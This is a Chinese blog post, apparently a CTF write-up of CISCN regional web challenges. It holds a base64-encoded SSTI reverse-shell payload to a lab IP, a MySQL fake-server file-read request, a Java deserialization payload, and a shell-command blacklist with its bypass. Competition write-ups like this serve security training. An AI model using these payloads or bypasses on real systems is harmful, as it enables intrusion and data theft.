N1Rvana's Blog
N1Rvana's Blog

CISCN西南赛区 WebWriteUp

 N1Rvana included in CTF
 About 300 words 2 minutes  - views  

weblog

/article.php?id=1存在sql注入,注入数据
找到隐藏路径,可以连接数据库,进行mysql fakeserver任意文件读取
/database.php

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

POST /database.php HTTP/1.1  
Host: 10.1.0.122:82  
Content-Length: 123  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://10.1.0.122:82  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Referer: http://10.1.0.122:82/hide/connect_fun_dbs_test_hides.php  
Accept-Encoding: gzip, deflate, br  
Accept-Language: zh-CN,zh;q=0.9  
Connection: close  
  
jsonData={"host":"10.1.0.130","port":3306,"username":"root","password":"password"}

读取flag文件,

ezssti

访问/hello点击连接跳转/destiny
直接打ssti

1

%23set(%24e=%22e%22);%24e.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null).exec(%22bash+-c+{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEuMC4xMTkvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}%22)

成功反弹shell

zwxajavaf

/backup.zip下载源码
存在反序列化
直接上传序列化的文件即可,
利用点
payload

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22

package com.example.zwxajavaf1;  
  
import java.io.FileOutputStream;  
import java.io.ObjectOutputStream;  
import java.lang.reflect.Field;  
  
public class JavaPayload{  
    public static void main(String[] args) throws Exception{  
        MyCustomObject myCustomObject = new MyCustomObject();  
        setFieldValue(myCustomObject,"filePath","/usr/local/tomcat/webapps/admin_info.txt");  
        serialize(myCustomObject);  
    }  
    public static void serialize(Object o) throws Exception{  
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));  
        oos.writeObject(o);  
    }  
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {  
        Field field = obj.getClass().getDeclaredField(fieldName);  
        field.setAccessible(true);  
        field.set(obj, value);  
    }  
}

上传后得到密码
反序列化之后得到密码
登陆后rce

ssrf2rce

访问/flag.php

1
2
3
4
5
6

flag{th1s_is_f4ke_flag}  
  
  
  
  
But,there is something in coooooomand.php~!!

访问coooooomand.php

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

<?php  
function executeCommand($command) {  
    if (preg_match('/cat| |\\\\|\${IFS}|%09|\$[*@x]|tac|iconv|shuf|comm|bat|more|less|nl|od|sed|awk|perl|python|ruby|xxd|hexdump|string/', $command)) {  
        return "Hacker!!!";  
    }  
  
    $output = shell_exec($command);  
    if ($output === null) {  
        return "uhhhh";  
    }  
  
    return $output;  
}  
  
$command = isset($_GET['command']) ? $_GET['command'] : '';  
  
if (!empty($command)) {  
    $result = executeCommand($command);  
    echo nl2br(htmlspecialchars($result, ENT_QUOTES, 'UTF-8'));  
} else {  
    echo highlight_file(__FILE__, true);  
}  
?>

进行绕过/coooooomand.php?command=/bin/ca?$IFS/flag

fix???

fix ctf rce 绕过 Orz

Updated on 2024-06-17 
CISCN Web
Back | Home
0%